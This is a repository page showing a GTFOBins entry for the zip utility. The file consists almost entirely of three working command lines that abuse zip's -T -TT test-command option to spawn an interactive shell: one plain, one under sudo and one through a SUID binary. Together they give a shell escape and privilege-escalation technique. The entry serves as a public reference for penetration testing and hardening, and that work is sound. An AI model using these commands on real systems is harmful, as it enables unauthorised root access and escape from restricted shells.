This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
14c8781f2d37267e57be9ba65fe5b1ebd9aeb54c
GTFOBins.github.io
/
_gtfobins
/
zip.md
Andrea Cardaci
f740b410cc
Simplify zip and add suid-limited
2018-08-19 11:43:26 +02:00
343 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-limited
code
zip /tmp/x.zip /etc/hosts -T -TT 'sh #' rm /tmp/x.zip
code
sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip
code
./zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip
Reference in New Issue
View Git Blame
Copy Permalink